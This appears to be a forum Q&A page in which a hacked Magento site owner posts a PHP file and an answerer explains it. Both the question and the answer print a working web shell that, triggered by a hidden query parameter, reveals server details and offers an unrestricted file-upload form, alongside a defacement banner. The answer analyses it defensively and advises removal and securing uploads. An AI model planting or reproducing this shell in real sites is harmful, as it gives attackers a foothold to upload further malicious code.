CODEWITHSUNDEEP
phpmagento
user829174
user829174

Reputation: 6362

My Magento web site was hacked, what does this php code do?

I just found some php file on my hosting, with a 0.01% knowledge in php, can someone please explain me what this code do?

<?php if(isset($_GET["ourzr"])){
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>berhasil</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>gagal";}
}
}?>
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>
body{overflow:hidden;background-color:black}
#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}

Upvotes: 3

Views: 1958

Answers (1)

Patrick Murphy
Patrick Murphy

Reputation: 2329

Code Breakdown:

if the variable in the query string has a value (ie. index.php?ourzr=set)

<?php 
   if(isset($_GET["ourzr"])){

Then display information about your servers operating system using the function php_uname() They use this information to target the next round of hacks to your system specifics.

echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";

Create an html form that allows more hack files to be uploaded

         echo"<form method=post enctype=multipart/form-data>";
         echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";

If a file has been uploaded, copy the files from the temp folder to a normal folder without the temp name but the original name

     if($_POST["v"]==up){
             if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
                    echo"<b>sucess</b>-->".$_FILES["f"]["name"];
                }else{
                    echo"<b>failed</b>";
                }
          }
      }
?>

This part just is a little mesage saying "I'm a kool script kiddie from the gangsters crew"

<title>Hacked by d3b~X</title>
                            <center>
                                <div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
    <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}

Conclusion:

DELETE THIS FILE ASAP

This script was somehow uploaded to your server through some vulnerability that likely still exists (Unless the hacker was nice enough to fix it for you).

They found away to get this one file on your server somewhere they can access it, now they want to use it to continue to upload scripts and other malicious data. Delete this file, and look in to securing anywhere your site uploads files of any kind.

Next Steps:

Read about how hackers use file uploads to upload scripts like these, and other things they can do with their own upload form: https://www.acunetix.com/websitesecurity/upload-forms-threat/

Read up on how to create a secure upload script: There are many other tutorials

Read more about security, and try to learn a little php. Let me know if you have any more specific questions

Hunt down this guy I guess: https://twitter.com/d3b_x

Upvotes: 12

Related Questions